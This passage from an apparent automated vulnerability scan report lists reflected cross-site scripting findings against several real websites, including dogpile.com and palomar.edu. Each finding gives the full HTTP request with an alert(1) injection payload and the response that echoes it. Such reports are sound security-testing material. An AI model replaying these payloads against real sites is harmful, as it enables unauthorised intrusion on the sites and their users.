Set-Cookie: NSC_wjq_hmpcbm.tqbsl.dpn_80=0e4367143660;expires=Fri, 01-Apr-11 16:44:24 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
s.prop23 = (clearValue) ? "" : "";
s.prop24 = (clearValue) ? "" : "";
s.prop27 = (clearValue) ? "" : "";
s.prop29 = (clearValue) ? "" : "http://www.google.com/search?hl=en&q=c01b6";alert(1)//507cc18a657";
s.prop30 = (clearValue) ? "" : "";
s.prop31 = (clearValue) ? "" : "";
s.prop32 = (clearValue) ? "" : "";
s.prop33 = (clearValue) ? "" : "";
s.prop36 = (c
...[SNIP]...

2.118. http://www.palomar.edu/favicon.ico [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.palomar.edu
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 1afc0<script>alert(1)</script>36d474edfa6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.palomar.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=1afc0<script>alert(1)</script>36d474edfa6

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 16:27:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4692


<html>

<head>

<meta http-equiv="Content-Language" content="en-us">
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">

<titl
...[SNIP]...
<br>
                   REFERER -
                   http://www.google.com/search?hl=en&q=1afc0<script>alert(1)</script>36d474edfa6
                   <hr width="85%" align="center">
...[SNIP]...

2.119. http://www.palomar.edu/favicon.ico [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.palomar.edu
Path:   /favicon.ico

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload b46a4<script>alert(1)</script>bb137ca376a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3b46a4<script>alert(1)</script>bb137ca376a
Host: www.palomar.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 16:27:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4655


<html>

<head>

<meta http-equiv="Content-Language" content="en-us">
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">

<titl
...[SNIP]...
<br>
                   BROWSER -
                   curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3b46a4<script>alert(1)</script>bb137ca376a
                   <br>
...[SNIP]...

2.120. http://a.collective-media.net/cmadj/ns.androidtapp/general [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidtapp/general

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea575'%3balert(1)//af3836957be was submitted in the cli cookie. This input was echoed as ea575';alert(1)//af3836957be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cmadj/ns.androidtapp/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=9242949008475990;ord1=123756;cmpgurl=http%253A//www.androidtapp.com/favicon.icoef3b2%25253Cscript%25253Ealert%25281%2529%25253C/script%25253Ed2de5acaa49? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(1)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7ea575'%3balert(1)//af3836957be; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; blue=1; qcdp=1; exdp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7302
Date: Fri, 01 Apr 2011 18:15:56 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-91116311_1301681756","http://ad.doubleclick.net/adj/ns.androidtapp/general;net=ns;u=,ns-91116311_1301681756,11e4f07c0988ac7ea575';alert(1)//af3836957be,Miscellaneous,;;ppos=atf;kw=;tile=2;cmw=nurl;sz=300x250,300x600;net=ns;ord1=123756;contx=Miscellaneous;dc=w;btg=;ord=9242949008475990?","300","250,300",false);</scr'+'ipt>
...[SNIP]...

2.121. http://dogpile.com/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dogpile.com
Path:   /dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6f97"-alert(1)-"16796aa2d2e was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: dogpile.com
Proxy-Connection: keep-alive
Referer: http://dogpile.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:38 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&ActionId=81494ffc47974db2916bc16a3af0cb01&CookieDomain=.dogpile.come6f97"-alert(1)-"16796aa2d2e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 01 Apr 2011 16:55:36 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=81494ffc47974db2916bc16a3af0cb01&ActionId=037345b31ef849fab100c16a3af0cb01&CookieDomain=.dogpile.come6f97"-alert(1)-"16796aa2d2e; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:15:36 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:36 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:55:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:55:36 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 50685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=81494ffc47974db2916bc16a3af0cb01&ActionId=037345b31ef849fab100c16a3af0cb01&CookieDomain=.dogpile.come6f97"-alert(1)-"16796aa2d2e; expires=Fri, 01 Apr 2011 17:15:36 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.122. http://view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the C3UID cookie is copied into the HTML document as plain text between tags. The payload b2114<script>alert(1)</script>83bb10cb61c was submitted in the C3UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568b2114<script>alert(1)</script>83bb10cb61c; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:11:33 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_04-01-2011-18-10-29; expires=Mon, 04-Apr-2011 18:11:33 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadcon_04-01-2011-18-11-08_13920678781301681468ZZZZadver_04-01-2011-18-11-33_8406006771301681493; expires=Wed, 30-Mar-2016 18:11:33 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adcon_13920678781301681468ZZZZadver_8406006771301681493; expires=Fri, 01-Apr-2011 18:26:33 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='15400897811300976568b2114<script>alert(1)</script>83bb10cb61c';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='8406006771301681493';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcal
...[SNIP]...

2.123. http://www.8tracks.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.8tracks.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 95c41<script>alert(1)</script>3c9048a049 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico95c41<script>alert(1)</script>3c9048a049 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.8tracks.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Content-Type: application/octet-stream
Connection: close
Status: 301
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
Location: http://8tracks.com/favicon.ico95c41<script>alert(1)</script>3c9048a049
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)
Content-Length: 170

Redirecting to <a href="http://8tracks.com/favicon.ico95c41<script>alert(1)</script>3c9048a049">http://8tracks.com/favicon.ico95c41<script>alert(1)</script>3c9048a049</a>

2.124. http://www.8tracks.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.8tracks.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb7fd"><script>alert(1)</script>8cdd22bd928 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icofb7fd"><script>alert(1)</script>8cdd22bd928 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.8tracks.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Content-Type: application/octet-stream
Connection: close
Status: 301
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
Location: http://8tracks.com/favicon.icofb7fd"><script>alert(1)</script>8cdd22bd928
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)
Content-Length: 176

Redirecting to <a href="http://8tracks.com/favicon.icofb7fd"><script>alert(1)</script>8cdd22bd928">http://8tracks.com/favicon.icofb7fd"><script>alert(1)</script>8cdd22bd928</a>

2.125. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11 [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile/ws/about/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54db6"-alert(1)-"a2bb9b9271 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile/ws/about/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:07 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=3e82ee12b85f4b1a9dd9c16a3af0cb01&ActionId=530d17a155f848679bfdc16a3af0cb01&CookieDomain=.dogpile.com54db6"-alert(1)-"a2bb9b9271

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=530d17a155f848679bfdc16a3af0cb01&ActionId=65ee416eb3a24f0fa5bdc16a3af0cb01&CookieDomain=.dogpile.com54db6"-alert(1)-"a2bb9b9271; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:33 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:33 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:33 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:32 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=530d17a155f848679bfdc16a3af0cb01&ActionId=65ee416eb3a24f0fa5bdc16a3af0cb01&CookieDomain=.dogpile.com54db6"-alert(1)-"a2bb9b9271; expires=Fri, 01 Apr 2011 17:34:33 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.126. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11 [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile/ws/contactUs/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33fd5"-alert(1)-"768c24deab8 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile/ws/contactUs/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.infospaceinc.com/contactus.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:11:55 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=8bf114849f6a409d9c06c16a3af0cb01&ActionId=2d7a6054427c4593a5ccc16a3af0cb01&CookieDomain=.dogpile.com33fd5"-alert(1)-"768c24deab8

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=2d7a6054427c4593a5ccc16a3af0cb01&ActionId=130c155302e24583b73bc16a3af0cb01&CookieDomain=.dogpile.com33fd5"-alert(1)-"768c24deab8; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:32:57 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:12:57 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:12:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:12:56 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 43573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=2d7a6054427c4593a5ccc16a3af0cb01&ActionId=130c155302e24583b73bc16a3af0cb01&CookieDomain=.dogpile.com33fd5"-alert(1)-"768c24deab8; expires=Fri, 01 Apr 2011 17:32:57 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.127. http://www.dogpile.com/dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11 [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b752"-alert(1)-"af835610013 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:07 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=530d17a155f848679bfdc16a3af0cb01&ActionId=f4a5e3c498ee4fafa621c16a3af0cb01&CookieDomain=.dogpile.com7b752"-alert(1)-"af835610013

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=f4a5e3c498ee4fafa621c16a3af0cb01&ActionId=b0aa64e9143c4175b855c16a3af0cb01&CookieDomain=.dogpile.com7b752"-alert(1)-"af835610013; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:27 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:27 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:27 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 43577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=f4a5e3c498ee4fafa621c16a3af0cb01&ActionId=b0aa64e9143c4175b855c16a3af0cb01&CookieDomain=.dogpile.com7b752"-alert(1)-"af835610013; expires=Fri, 01 Apr 2011 17:34:27 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.128. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11 [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b37d"-alert(1)-"effb104696b was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

